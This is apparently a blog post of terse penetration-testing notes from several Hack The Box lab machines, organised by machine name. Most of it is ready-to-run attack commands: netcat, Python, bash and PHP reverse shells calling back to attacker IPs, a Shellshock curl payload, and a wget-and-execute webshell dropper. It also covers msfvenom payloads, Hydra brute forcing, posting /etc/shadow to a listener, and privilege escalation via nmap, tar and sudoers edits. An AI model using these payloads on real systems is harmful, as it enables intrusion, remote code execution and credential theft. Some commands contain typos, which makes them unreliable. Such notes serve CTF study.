2. when doing directory search , if you are getting ‘300’ response code , then you have to check for those pages too.
3. If you find a framework installed in a website, always check for the version, and in most cases you will the exploit associated with it in exploit-db.
4. echo command can be used to input text into a already exsisting file. COnsider you have a script file with some default scripts inside. With echo command we can input some malicious scripts into the already exsisting script and run to get our malicious intent.
#echo”nc -lvp 5555” > moniter.sh
5.msfvenom command to get netcat listner
#msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.103 lport=2222 R
The above is the msfvenom command and below is the payload produced.
#mkfifo /tmp/admoszx; nc 192.168.1.103 2222 0</tmp/admsozx | /bin/sh >/tmp/admson 2>&1; rm /tmp/admoszx )
Beep————————————————————-
1.whenever you find a machine with port 80 open , always dir search it with dirb and any other tools
2. Metasploit module to check for priv-escalation-
Run Local Exploit Suggester for privilege escalation suggestions
#use post/multi/recon/local_exploit_suggester
3.searchsploit modules are located under “/usr/share/exploitdb/exploit”
4.if you have a jebbrish of data in a web-page, using the “view-source” will reveal the code in a clean format.
5.list of ssh users can be retrieved from the “/etc/passwd” file and delete the ‘nologin” items.
6.curl onliner for code execution if you have a “.cgi” file found. its like combining curl & .cgi for code execution.
#curl -k -H “user-agent: () { :; }; bash -i >& /dev/tcp/10.10.14.3/8081 0>&1” https://10.10.10.7:10000/session_login.cgi
7.privilege escalation using Nmap
#sudo nmap –interactive

Cronos————————————————–
1.if port ’53’ is open, the first thing to figure out is the domain names using the nslookup.
2.another thing to check if port 53 is open is to look for zone transfer. usig host command
#host -l cronos.htb 10.10.10.13
3.Zone transfer mechanism using dig command]
#dig axfr @10.10.10.13 cronos.htb
4. command to find no.of passwords in file using “wc”.
#wc -l /usr/share/john/password.lst
5.Running SQL injection using burp request
# sqlmap -v 4 -r login.txt
first intercept the login request using Burp and save it in a file (login.txt). Then, run sqlmap on the request.
6. python one liner
#python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.14.6”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
7.sql injection cheet-sheat- https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/
8. cronjob- https://tigr.net/3203/2014/09/13/getting-wordpress-cron-work-in-multisite-environment/

Nineveh——————————————————————
1. Hydra attack
#hydra -l ‘admin’ -P rockyou.txt 10.10.10.43 http-post-form “/department/login.php:username=^USER^&amp;password=^PASS^:Invalid Password!”
2. wget to download shell code
# wget YOURIP/shell.txt -O /tmp/shell.php
3.Php code to downlaod a shell code and then execute
# <?php system(“wget YOURIP/shell.txt -O /tmp/shell.php; php /tmp/shell.php”); ?>
-wget – downloads the the main file on the target machine
-O /tmp/shell.php – converts the text file into php so we can execute it and saves it inside /tmp folder
-;php /tmp/shell.php – runs the php file with our malicious payload inside
4.reading emails inside a user
# cat /var/mail/amrois
5.If any secret folder with any image, use binwalk to extract contents from image
# binwalk -e secret.png
#strings secret.png
Strings will also extract contents from a image.
6. If you have ssh private key availavle , then we can use that to login in inside the victim machine
#ssh -i sshkey.key amrois@10.10.10.43
Note: If you get an error saying “the .key file is unprotected”, simply chmod it to 600
7. bash reverse shell
# bash -i >& /dev/tcp/X.X.X.X/1337 0>&1

SolidState——————————————————————————
1.if port 110 is open , try connecting to it using telnet
#telnet 10.10.10.51 110
#user kamal
#pass password
2. To list the emails from pop3 port, us the “list” command followed by “retr 1”
#LIST
#retr 1
3. If any unfamiliar service or port is open, we can use the netcat tool to connect to that port and then authenticate
# nc 192.156.23.21 4505
4.looking for services owned by a particular user
#ps aux | grep james
5.making Pyhton file for reverse shell
#! /usr/bin/env python
import os
import sys
os.system(‘/bin/nc -e /bin/bash 10.10.14.12 7777’)
6. Crontab command to list current crontab file
#crontab -l
7. Telnet to test smtp- https://docs.microsoft.com/en-us/exchange/mail-flow/test-smtp-with-telnet?view=exchserver-2019

Node—————————————————–
1. Hashes can be decoded in https://crackstation.net
2. “.backup” files can be read with cat command.
3. decoding a base64 type file
#cat myplace.backup | base64 –decode > myplace
4.finding the file type
#find myfile
5.bruteforcing a password protected zip file
#fcrackzip -D -p /usr/share/wordlists/rockyou.txt data.zip
6. checking for services run by a different user. This will check for services run by tom.
#ps aux | grep tom
7. Python reverse-shell
#msfvenom -p cmd/unix/reverse_python lhost=10.10.14.3 lport 8765 R
8.Running a mongodb service and fire up MongoDB and tell it what to run with the scheduler.
#mongo -u admin -p kam2341 scheduler
9.A symbolic link, also known as a symlink or soft link, is a special type of file that points to another file or directory.
#ln -s /root/root.txt /tmp/test
10. When you get a execuatble look for the following
-file type
#file backup
-executables string
#strings backup
-the system calls made by the executable
# ltrace backup test1
Here we use the ‘Itrace’ command.The ltrace command can be used to intercept and record the dynamic calls made to shared libraries. The amount of output generated by the ltrace command can be overwhelming for some commands
12. The ~ is used to specify a user’s home directory and more specifically whatever is defined in the $HOME environment variable.changing “$HOME” environment variable to some other location so that we can do the privilege escalation
#export HOME=/root/

Valentine——————————————–
1. removing spaces from lines using sed command
#sed ‘s/ //g’ filename.txt> sshkey
2.when exploit codes are written windows newline character, use the following command to remove that character
#sed -i -e “s/^M//” exploit.sh
2.Decoding a base64 string
# echo aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== | base64 –d
3. if you have the passphrase and the private key, you can login into the ssh.Usually the private keys will have the name of the ssh user in most cases.
# ssh –i key hype@10.10.10.79
4.creating a reverse python cell
#msfvenom -p cmd/unix/reverse_python lhost 10.10.14.22 lport 1234 R
5. Also look into the bash history. sometimes history will give us a good clue on how to proceed
6. combining dirty cow exploit
# gcc -pthread dirty.c -o dirty -lcrypt

Valentine—————————————————————————-
1. decoding a hash value
#cat file | base64 -d
2.Using supercopy to copy files from the victim machine
#scp charix@10.10.10.84:secret.zip /root/Desktop/
3.checking for services runnig using sockstat
#sockstat -4 -l
4. netstat checking for open service
# netstat -an
# netstat -an -p tcp
4.Port number of VNC
5900+ and 5800+
5.Local ssh tunneling
# ssh -L 5901:127.0.0.1:5901 charix@10.10.10.84
6.opening a VNC viewer
#vncviewer -passwd secret 127.0.0.1:5901
7.Decoding a string 13 times
#import base64
inp_string =”encoded string”
times = 13
for i in range(times):
inp_string = base64.b64decode(inp_string)
out_string = inp_string.decode(‘UTF-8’)
print(out_string)
8. checking for processes
#ps -auwwx | grep vnc
9.Tunneling using proxychains
10. enabling VNC for root user.
#cat /etc/rc.conf

Sunday—————————————————-
1.”unable to negotiate”>> if this error comes in ssh connection then this is the probabale reason.
In this case, the client and server were unable to agree on the key exchange algorithm. The server offered only a single method diffie-hellman-group1-sha1. OpenSSH supports this method, but does not enable it by default because is weak and within theoretical range of the so-called Logjam attack.
#ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 sunny@10.10.10.76 -p22022
here with the help of “oKexAlgorithms” we need to specify the algorithm which the ssh server supports.
https://mycyberuniverse.com/error/no-matching-key-exchange-method-found-openssh7.html
2. “sudo -l” will search for the commands with sudo permissions and
“find / -perm -u=s -type f 2>/dev/null” will check for system binaries with sudo permission.
3.Generating “.elf” payload
#msfvenom -p solaris/x86/shell_reverse_tcp lhost=10.10.14.6 lport=5555 -f elf > /root/Desktop/raj.elf
elf- Executable Linkable Format, ELF was choosen as the standard binary file format for Unix and Unix-like systems on x86 processors.
4. Opening up a php webserver
#php -S 0.0.0.0:80
5.Using wget to download a specific file
#sudo /usr/bin/wget –post-file=/etc/shadow 10.10.14.6
on the other end open the nc
#nc -lvp 80
6.Finger service installed here
7. If there are 2-3 different ssh users, then there is a chance of different users having differnt privsec methods to work on.

tartarsauce———————————————————
1. netcat reverseshell
# msfvenom -p cmd/unix/reverse_netcat lhost=10.10.14.177 lport=4444 R
2.Identify cron with pspy. pspy is my go-to for processes detection
https://github.com/DominicBreuker/pspy
3. running a command with the sudo permission of a user
#sudo -u kamal tar -xvf
4. converting a shell file to a tar file
# tar -cvf a.tar a.sh
5. using tar command to execute a shell
#sudo -u onuma tar -xvf a.tar –to-command /bin/bash
6.another privsec with tar where the option “–checkpoint=x” can be used to execute a shell. this option allows a user to specify a action that he want to do
#sudo -u onuma tar -cf /dev/null /dev/null –checkpoint=1 –checkpoint-action=exec=/bin/bash

Irked————————————————-
1. to see the code of searchsploit exploit modules
# searchsploit -x exploits/linux/remote/exploit.rb
2.extracting images using stegnography
#steghide info irked.jpg
# steghide extract -sf irked.jpg
3.command to see the working of executables- itrace.
# ltrace ./viewuser
4.When u have backdoor exploits , always check to see the exploits in exploit-db and searchsploit. Those codes will give u idea on how the exploit is working
5.looking for binaries for priv-esc.
#ls -lah usr/bin/
here when listing, you will get some binaries with red color, that means those are suid binaeries.

Friendzone————————————-
1.enumerating smb if smb port is open
#smbmap -H 10.10.10.123
2.connecting to smb service
# smbclient //10.10.10.123/general
3.enumerating subdomains using host command
#host -l friendzone.red 10.10.10.123
4.Looking for zone transfer
#dig axfr friendzone.red @10.10.10.123
5.Downlaod files using smb service
#put sehll.php
6.Editing sudeors file and adding a user
# sudo vi /etc/sudoers
and adding a user named ‘kamal’.
#kamal ALL=(ALL) NOPASSWD:ALL

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Leave a Reply

Your email address will not be published. Required fields are marked *